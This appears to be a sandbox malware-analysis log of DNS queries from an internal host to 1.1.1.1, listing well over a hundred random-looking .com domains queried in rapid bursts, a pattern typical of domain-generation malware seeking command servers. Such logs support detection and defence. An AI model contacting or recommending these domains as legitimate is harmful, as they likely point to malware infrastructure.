                                                                                                                                                                                                          Sep 8, 2024 10:54:04.339833021 CEST192.168.2.91.1.1.10x5e7Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.360496998 CEST192.168.2.91.1.1.10x965cStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.363627911 CEST192.168.2.91.1.1.10x9924Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.366234064 CEST192.168.2.91.1.1.10xb244Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.896445990 CEST192.168.2.91.1.1.10xddeStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.898518085 CEST192.168.2.91.1.1.10x8044Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.900335073 CEST192.168.2.91.1.1.10x7acStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.901132107 CEST192.168.2.91.1.1.10x91beStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.907136917 CEST192.168.2.91.1.1.10xf748Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.908003092 CEST192.168.2.91.1.1.10x5b65Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.908694983 CEST192.168.2.91.1.1.10x3e3aStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.909729004 CEST192.168.2.91.1.1.10xf759Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.909904957 CEST192.168.2.91.1.1.10x90e6Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.910223007 CEST192.168.2.91.1.1.10x768cStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.911792994 CEST192.168.2.91.1.1.10xfa44Standard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.017088890 CEST192.168.2.91.1.1.10xf9caStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.036258936 CEST192.168.2.91.1.1.10x53f5Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.037244081 CEST192.168.2.91.1.1.10xe777Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.037460089 CEST192.168.2.91.1.1.10xa6b7Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.038806915 CEST192.168.2.91.1.1.10x6313Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.040694952 CEST192.168.2.91.1.1.10xb0b3Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.041256905 CEST192.168.2.91.1.1.10x3dbcStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.042344093 CEST192.168.2.91.1.1.10x7156Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.042778969 CEST192.168.2.91.1.1.10xacdStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.043821096 CEST192.168.2.91.1.1.10xbb94Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.044025898 CEST192.168.2.91.1.1.10xb5f5Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.045912027 CEST192.168.2.91.1.1.10x178cStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052159071 CEST192.168.2.91.1.1.10x4d34Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052371025 CEST192.168.2.91.1.1.10x6637Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052580118 CEST192.168.2.91.1.1.10x78a2Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052751064 CEST192.168.2.91.1.1.10xd128Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053719997 CEST192.168.2.91.1.1.10x3b0dStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.054284096 CEST192.168.2.91.1.1.10xf598Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068876982 CEST192.168.2.91.1.1.10x5b56Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069070101 CEST192.168.2.91.1.1.10x4457Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069262028 CEST192.168.2.91.1.1.10x22daStandard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069400072 CEST192.168.2.91.1.1.10xdaStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069562912 CEST192.168.2.91.1.1.10xfb78Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069727898 CEST192.168.2.91.1.1.10x32c3Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070072889 CEST192.168.2.91.1.1.10xf97fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070291996 CEST192.168.2.91.1.1.10x99bbStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070429087 CEST192.168.2.91.1.1.10x2401Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070619106 CEST192.168.2.91.1.1.10x591eStandard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071643114 CEST192.168.2.91.1.1.10x5153Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071804047 CEST192.168.2.91.1.1.10xb196Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072004080 CEST192.168.2.91.1.1.10x69faStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072221041 CEST192.168.2.91.1.1.10x9fb9Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072242975 CEST192.168.2.91.1.1.10xb899Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.073992968 CEST192.168.2.91.1.1.10xae97Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079078913 CEST192.168.2.91.1.1.10x1bc3Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079243898 CEST192.168.2.91.1.1.10x8cbaStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079402924 CEST192.168.2.91.1.1.10x5f0Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080049038 CEST192.168.2.91.1.1.10xb5d9Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080230951 CEST192.168.2.91.1.1.10x7cecStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080405951 CEST192.168.2.91.1.1.10x4190Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080549955 CEST192.168.2.91.1.1.10x2560Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135046959 CEST192.168.2.91.1.1.10xfaedStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135236025 CEST192.168.2.91.1.1.10xdd36Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135412931 CEST192.168.2.91.1.1.10x8067Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.136312962 CEST192.168.2.91.1.1.10x1903Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.965338945 CEST192.168.2.91.1.1.10x3b29Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966331959 CEST192.168.2.91.1.1.10x118dStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966898918 CEST192.168.2.91.1.1.10x7ad8Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969425917 CEST192.168.2.91.1.1.10xaf56Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969644070 CEST192.168.2.91.1.1.10xdd41Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.970660925 CEST192.168.2.91.1.1.10x985aStandard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.971765995 CEST192.168.2.91.1.1.10x805dStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972218037 CEST192.168.2.91.1.1.10x6ee1Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972635031 CEST192.168.2.91.1.1.10x9f39Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972774029 CEST192.168.2.91.1.1.10xf37dStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973210096 CEST192.168.2.91.1.1.10xf402Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973578930 CEST192.168.2.91.1.1.10x7c11Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973633051 CEST192.168.2.91.1.1.10xa86eStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974359989 CEST192.168.2.91.1.1.10x98faStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974360943 CEST192.168.2.91.1.1.10xc8beStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974842072 CEST192.168.2.91.1.1.10x838Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.975255013 CEST192.168.2.91.1.1.10x3894Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976052046 CEST192.168.2.91.1.1.10x5b01Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976309061 CEST192.168.2.91.1.1.10x3437Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976914883 CEST192.168.2.91.1.1.10x8fcbStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977085114 CEST192.168.2.91.1.1.10x5ddaStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977339029 CEST192.168.2.91.1.1.10xed61Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977801085 CEST192.168.2.91.1.1.10xbf0fStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977987051 CEST192.168.2.91.1.1.10xa1baStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978353977 CEST192.168.2.91.1.1.10x664Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978521109 CEST192.168.2.91.1.1.10xadddStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978801012 CEST192.168.2.91.1.1.10xaf8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979181051 CEST192.168.2.91.1.1.10x1dcbStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979803085 CEST192.168.2.91.1.1.10x620dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.981178999 CEST192.168.2.91.1.1.10xd8f7Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.624057055 CEST192.168.2.91.1.1.10x980fStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625096083 CEST192.168.2.91.1.1.10xec35Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625605106 CEST192.168.2.91.1.1.10xcc6aStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.626652956 CEST192.168.2.91.1.1.10xb6bfStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.627223969 CEST192.168.2.91.1.1.10x1339Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.628807068 CEST192.168.2.91.1.1.10x90e8Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630790949 CEST192.168.2.91.1.1.10x3a3eStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.637098074 CEST192.168.2.91.1.1.10x28e7Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639367104 CEST192.168.2.91.1.1.10x81b4Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639539003 CEST192.168.2.91.1.1.10x42f6Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639858007 CEST192.168.2.91.1.1.10x663eStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.640165091 CEST192.168.2.91.1.1.10xd7e9Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642530918 CEST192.168.2.91.1.1.10xd623Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642781973 CEST192.168.2.91.1.1.10xbc08Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643024921 CEST192.168.2.91.1.1.10xecf3Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643807888 CEST192.168.2.91.1.1.10x5bbbStandard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651288033 CEST192.168.2.91.1.1.10x2e2fStandard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651515007 CEST192.168.2.91.1.1.10x36fdStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651688099 CEST192.168.2.91.1.1.10x4039Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652514935 CEST192.168.2.91.1.1.10xc797Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661616087 CEST192.168.2.91.1.1.10xf5d5Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661787987 CEST192.168.2.91.1.1.10x5a11Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661874056 CEST192.168.2.91.1.1.10xbdacStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663011074 CEST192.168.2.91.1.1.10x993fStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663223982 CEST192.168.2.91.1.1.10xf2cdStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663311005 CEST192.168.2.91.1.1.10x40d7Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663486958 CEST192.168.2.91.1.1.10x65d4Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663665056 CEST192.168.2.91.1.1.10xc9b2Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663800955 CEST192.168.2.91.1.1.10xd13aStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663957119 CEST192.168.2.91.1.1.10x401dStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664120913 CEST192.168.2.91.1.1.10x3559Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664268970 CEST192.168.2.91.1.1.10xc4d3Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664298058 CEST192.168.2.91.1.1.10x87f7Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664427042 CEST192.168.2.91.1.1.10xedd7Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664546967 CEST192.168.2.91.1.1.10x19b1Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664637089 CEST192.168.2.91.1.1.10x3b67Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666069984 CEST192.168.2.91.1.1.10x1660Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666497946 CEST192.168.2.91.1.1.10xccb6Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.670886040 CEST192.168.2.91.1.1.10x13d8Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671149015 CEST192.168.2.91.1.1.10x5575Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.675982952 CEST192.168.2.91.1.1.10x1e9Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676870108 CEST192.168.2.91.1.1.10x8aefStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676968098 CEST192.168.2.91.1.1.10x2881Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677047968 CEST192.168.2.91.1.1.10x63ddStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677146912 CEST192.168.2.91.1.1.10x7017Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677202940 CEST192.168.2.91.1.1.10x53e4Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667628050 CEST192.168.2.91.1.1.10x3b9aStandard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667792082 CEST192.168.2.91.1.1.10x2459Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.677196980 CEST192.168.2.91.1.1.10x239cStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.679851055 CEST192.168.2.91.1.1.10xaf24Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.680449009 CEST192.168.2.91.1.1.10xf5ecStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681027889 CEST192.168.2.91.1.1.10xbc54Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681258917 CEST192.168.2.91.1.1.10xb2d7Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681708097 CEST192.168.2.91.1.1.10x6cbeStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681737900 CEST192.168.2.91.1.1.10xd11cStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682246923 CEST192.168.2.91.1.1.10x4860Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682471991 CEST192.168.2.91.1.1.10xca0aStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683506966 CEST192.168.2.91.1.1.10x27c2Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683541059 CEST192.168.2.91.1.1.10xf20fStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.684585094 CEST192.168.2.91.1.1.10x60ddStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685456991 CEST192.168.2.91.1.1.10x43f4Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685796022 CEST192.168.2.91.1.1.10x925dStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685832024 CEST192.168.2.91.1.1.10xb8f4Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686414957 CEST192.168.2.91.1.1.10x8652Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686672926 CEST192.168.2.91.1.1.10xad2cStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686892986 CEST192.168.2.91.1.1.10xd730Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687210083 CEST192.168.2.91.1.1.10x21b5Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687715054 CEST192.168.2.91.1.1.10x638eStandard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.688721895 CEST192.168.2.91.1.1.10x2d9aStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691124916 CEST192.168.2.91.1.1.10xbfa2Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691868067 CEST192.168.2.91.1.1.10x583cStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.694843054 CEST192.168.2.91.1.1.10xb3c4Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.700905085 CEST192.168.2.91.1.1.10x9ecbStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.704210997 CEST192.168.2.91.1.1.10x2cacStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.705326080 CEST192.168.2.91.1.1.10x81e7Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.710743904 CEST192.168.2.91.1.1.10xb837Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713314056 CEST192.168.2.91.1.1.10xd2fbStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713489056 CEST192.168.2.91.1.1.10xfcc5Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.729156971 CEST192.168.2.91.1.1.10xf63Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731163025 CEST192.168.2.91.1.1.10x5ab3Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731775999 CEST192.168.2.91.1.1.10xaa29Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.733995914 CEST192.168.2.91.1.1.10x77fbStandard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735116005 CEST192.168.2.91.1.1.10xa693Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735850096 CEST192.168.2.91.1.1.10xfe4eStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.736519098 CEST192.168.2.91.1.1.10x8a7Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.737396002 CEST192.168.2.91.1.1.10x9e0Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.764955044 CEST192.168.2.91.1.1.10x8109Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766154051 CEST192.168.2.91.1.1.10x70beStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766325951 CEST192.168.2.91.1.1.10xbcb6Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.766587019 CEST192.168.2.91.1.1.10x6a3aStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.768960953 CEST192.168.2.91.1.1.10xb363Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
